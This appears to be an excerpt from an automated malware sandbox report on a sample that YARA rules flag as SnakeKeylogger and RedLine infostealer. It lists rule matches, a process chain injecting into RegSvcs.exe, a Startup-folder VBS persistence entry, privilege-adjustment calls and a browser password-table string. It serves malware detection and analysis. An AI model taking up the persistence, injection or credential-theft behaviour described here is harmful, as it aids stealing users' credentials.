Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02FE1448	7_2_02FE1448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02FE1437	7_2_02FE1437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02FE11A8	7_2_02FE11A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02FE1199	7_2_02FE1199

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: String function: 00E28900 appears 42 times
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: String function: 00E20AE3 appears 70 times
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: String function: 00E07DE1 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: String function: 00628900 appears 42 times
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: String function: 00620AE3 appears 70 times
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: String function: 00607DE1 appears 35 times

Source: CvzLvta2bG.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.definitiveness.exe.1b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.definitiveness.exe.10c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.2373788703.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2490143764.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: RegSvcs.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 6900, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@2/2

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E6A06A GetLastError,FormatMessageW,

0_2_00E6A06A

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E581CB AdjustTokenPrivileges,CloseHandle,	0_2_00E581CB
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00E587E1
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006581CB AdjustTokenPrivileges,CloseHandle,	2_2_006581CB
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_006587E1

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00E6B3FB

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00E7EE0D

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E783BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00E783BB

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00E04E89

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

File created: C:\Users\user\AppData\Local\Hymenophyllaceae

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

File created: C:\Users\user\AppData\Local\Temp\aut16C0.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs"

Source: CvzLvta2bG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.3599413554.000000000316D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599413554.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599413554.000000000313E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599413554.000000000312E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599413554.0000000003161000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.000000000362E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.000000000363E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.0000000003661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.000000000455D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.000000000366D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: CvzLvta2bG.exe	Virustotal: Detection: 73%
Source: CvzLvta2bG.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

File read: C:\Users\user\Desktop\CvzLvta2bG.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CvzLvta2bG.exe "C:\Users\user\Desktop\CvzLvta2bG.exe"
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Process created: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe "C:\Users\user\Desktop\CvzLvta2bG.exe"
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\CvzLvta2bG.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe "C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe"
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe"
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Process created: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe "C:\Users\user\Desktop\CvzLvta2bG.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\CvzLvta2bG.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe "C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Section loaded: userenv.dll	Jump to behavior
